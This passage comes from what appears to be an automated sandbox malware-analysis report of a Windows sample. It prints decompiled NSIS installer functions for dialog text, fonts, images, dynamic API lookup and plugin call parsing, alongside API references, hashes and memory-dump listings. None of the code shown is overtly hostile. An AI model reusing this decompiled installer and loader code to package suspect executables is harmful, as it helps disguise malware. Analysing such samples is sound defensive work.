CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}

0x00404e7a
0x00404e7f
0x00404e87
0x00404e88
0x00404e95
0x00404e9d
0x00404e9e
0x00404ea0
0x00404ea2
0x00404ea4
0x00404ea7
0x00404ea7
0x00404eae
0x00404eb4
0x00404eb4
0x00404ebb
0x00404ec2
0x00404ec5
0x00404ec8
0x00404ec8
0x00404ecc
0x00404edc
0x00404ede
0x00404ee1
0x00404e8a
0x00404e8a
0x00404e91
0x00404e91
0x00404ee9
0x00404ef4
0x00404f0a
0x00404f1b
0x00404f37

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
wsprintfW.USER32 ref: 00404F1B
SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E

Strings

%u.%u%s%s, xrefs: 00404EFC
H7B, xrefs: 00404F04

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8

Uniqueness

Uniqueness Score: -1.00%

Function 74252480 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E74252480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E7425135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E742512E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M742525F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E742513B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E742513B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x7425506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7425506c, __eax,  *0x7425506c, 0, 0);
									goto L27;
								case 4:
									__eax = E742512CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E742513B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x7425506c =  *0x74255074 + ( *(__esi + 0x18) - 1) *  *0x7425506c * 2 + 0x18;
									 *__ebx =  *0x74255074 + ( *(__esi + 0x18) - 1) *  *0x7425506c * 2 + 0x18;
									asm("cdq");
									__eax = E74251510(__edx,  *0x74255074 + ( *(__esi + 0x18) - 1) *  *0x7425506c * 2 + 0x18, __edx,  *0x74255074 + ( *(__esi + 0x18) - 1) *  *0x7425506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E742512CC(0x74255044);
					goto L10;
				}
			}

0x74252494
0x74252498
0x742524a3
0x742524a3
0x742524aa
0x742524af
0x00000000
0x00000000
0x742524b3
0x742524b6
0x00000000
0x00000000
0x742524bb
0x742524c6
0x742524d6
0x00000000
0x742524cd
0x742524cf
0x742524e5
0x00000000
0x742524e5
0x742524bd
0x742524bd
0x742524e6
0x742524e6
0x742524e8
0x742524ec
0x742524ec
0x742524ef
0x742524ef
0x742524f7
0x742524ff
0x74252502
0x742525c1
0x742525c2
0x742525cd
0x742525f7
0x742525f7
0x742525dd
0x742525e9
0x742525df
0x742525df
0x742525df
0x00000000
0x74252508
0x74252508
0x00000000
0x7425250f
0x00000000
0x00000000
0x74252517
0x00000000
0x00000000
0x74252525
0x74252527
0x00000000
0x00000000
0x74252548
0x7425254e
0x74252551
0x74252553
0x74252563
0x00000000
0x00000000
0x74252530
0x74252535
0x74252538
0x74252539
0x00000000
0x00000000
0x7425256f
0x74252575
0x74252576
0x74252579
0x7425257a
0x7425257c
0x00000000
0x00000000
0x74252588
0x7425258b
0x74252597
0x74252599
0x00000000
0x00000000
0x742525a5
0x742525b1
0x742525b4
0x742525b6
0x742525b9
0x00000000
0x00000000
0x74252508
0x74252502
0x742524db
0x742524e0
0x00000000
0x742524e0

APIs

GlobalFree.KERNEL32(00000000), ref: 742525C2

Part of subcall function 742512CC: lstrcpynW.KERNEL32(00000000,?,7425137F,00000019,742511CA,-000000A0), ref: 742512DC

GlobalAlloc.KERNEL32(00000040), ref: 74252548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 74252563

Memory Dump Source

Source File: 00000000.00000002.1945649868.0000000074251000.00000020.00000001.01000000.00000004.sdmp, Offset: 74250000, based on PE: true

Associated: 00000000.00000002.1945555867.0000000074250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945760877.0000000074254000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945856765.0000000074256000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74250000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 9c49aa8b8c6afb17fad52e0765561fef3ce68ed9ae989be5d75ebb7c8d2bd489
Instruction ID: 85a54ccb23ec21d7ffa9c9b91f2a1f468dcabc35b52989fb97bfbb9deaa93ef6
Opcode Fuzzy Hash: 9c49aa8b8c6afb17fad52e0765561fef3ce68ed9ae989be5d75ebb7c8d2bd489
Instruction Fuzzy Hash: C541CCB1618205EFD718DF26D844B66F7B8FB88310F204999E846C61A1EB34A660CF71

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll,00000000), ref: 004068A4

CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED

Uniqueness

Uniqueness Score: -1.00%

Function 742516BD Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E742516BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x742516d7
0x742516e3
0x742516f0
0x742516f7
0x74251700
0x7425170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,742522D8,?,00000808), ref: 742516D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,742522D8,?,00000808), ref: 742516DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,742522D8,?,00000808), ref: 742516F0
GetProcAddress.KERNEL32(742522D8,00000000), ref: 742516F7
GlobalFree.KERNEL32(00000000), ref: 74251700

Memory Dump Source

Source File: 00000000.00000002.1945649868.0000000074251000.00000020.00000001.01000000.00000004.sdmp, Offset: 74250000, based on PE: true

Associated: 00000000.00000002.1945555867.0000000074250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945760877.0000000074254000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945856765.0000000074256000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74250000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 728db571bb291b65d144c942c376674780ecfea5688f00d20784e4522fa79a1f
Instruction ID: cbc3be507bf4775ed413206da613ec3652ebd576ffa689fee75f85c232f6c1b8
Opcode Fuzzy Hash: 728db571bb291b65d144c942c376674780ecfea5688f00d20784e4522fa79a1f
Instruction Fuzzy Hash: 70F01C7325A1387BD62016AB8C4CEEBFE9CDF8B2F5B310251F6289219186619C11E7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405f38
0x00405f45
0x00405f46
0x00405f51
0x00405f59
0x00405f59
0x00405f61

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
lstrcatW.KERNEL32(?,0040A014), ref: 00405F59

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED

Uniqueness

Uniqueness Score: -1.00%

Function 742510E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E742510E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x7425506c = _a8;
				 *0x74255070 = _a16;
				 *0x74255074 = _a12;
				_a12( *0x74255048, E74251651, _t73);
				_t66 =  *0x7425506c +  *0x7425506c * 4 << 3;
				_t27 = E742512E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x74255040;
							if( *0x74255040 == 0) {
								goto L26;
							}
							E74251603( *0x74255074, _t31 + 4, _t66);
							_t34 =  *0x74255040;
							_t86 = _t86 + 0xc;
							 *0x74255040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E74251312(E7425135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E74251381(_t80, E742512E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E74251603(_t10,  *0x74255074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x74255040;
							 *0x74255040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x74255070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E74251603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x7425506c +  *0x7425506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E74251603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x74255070);
						 *( *0x74255070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x742510eb
0x74251100
0x74251109
0x7425110e
0x74251119
0x7425111c
0x74251125
0x74251129
0x7425112b
0x742512b0
0x742512ba
0x742512ba
0x74251132
0x74251132
0x74251137
0x74251138
0x7425113a
0x7425113d
0x74251256
0x74251259
0x74251271
0x74251271
0x74251278
0x00000000
0x00000000
0x74251285
0x7425128a
0x7425128f
0x74251294
0x7425129a
0x7425129b
0x00000000
0x7425129b
0x7425125b
0x7425125e
0x742511bc
0x742511bf
0x742511c2
0x742511cb
0x742511d0
0x00000000
0x742511d1
0x74251264
0x74251266
0x742511a2
0x742511a5
0x742511a8
0x742511b1
0x00000000
0x742511b1
0x74251164
0x74251165
0x74251177
0x74251180
0x74251184
0x7425118e
0x74251191
0x74251193
0x74251193
0x00000000
0x74251165
0x74251143
0x74251218
0x7425121d
0x74251221
0x74251223
0x7425122c
0x7425122f
0x74251238
0x7425123d
0x7425123d
0x74251247
0x7425124a
0x00000000
0x74251250
0x74251149
0x7425114c
0x742511e9
0x742511ed
0x742511f7
0x742511fb
0x74251205
0x7425120a
0x74251211
0x00000000
0x74251211
0x74251152
0x74251155
0x00000000
0x00000000
0x7425115b
0x7425115e
0x742511b8
